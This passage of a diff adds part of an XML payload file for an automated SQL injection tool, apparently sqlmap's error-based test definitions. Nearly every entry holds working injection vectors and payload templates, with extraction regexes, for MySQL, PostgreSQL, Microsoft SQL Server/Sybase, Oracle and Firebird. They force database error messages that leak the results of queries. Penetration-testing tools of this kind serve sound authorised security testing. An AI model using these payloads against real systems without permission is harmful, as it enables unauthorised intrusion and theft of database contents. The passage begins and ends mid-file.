+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <!-- It does not work against ORDER BY or GROUP BY clause -->
+        <title>MySQL &gt;= 4.1 OR error-based - WHERE, HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            -->
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+    <!-- This payload with AND does not work -->
+    <test>
+        <title>MySQL OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
+        <request>
+            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
+        <request>
+            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+            <dbms_version>&gt;= 8.1.6</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+            <dbms_version>&gt;= 8.1.6</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird AND error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!--
+         TODO: if possible, add payload for SQLite, Microsoft Access,
+         and SAP MaxDB - no known techniques at this time
+    -->
+    <!-- End of error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
+
+    <!-- Error-based tests - LIMIT clause -->
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+    <!-- End of error-based tests - LIMIT clause -->
+
+    <!-- Error-based tests - Parameter replace -->
+    <test>
+        <title>MySQL &gt;= 5.0 error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
+            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
+            -->
+            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+            -->
+            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
+        <request>
+            <payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!-- End of error-based tests - Parameter replace -->
+
+    <!-- Error-based tests - ORDER BY, GROUP BY clause -->
+    <test>
+        <title>MySQL &gt;= 5.0 error-based - ORDER BY, GROUP BY clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
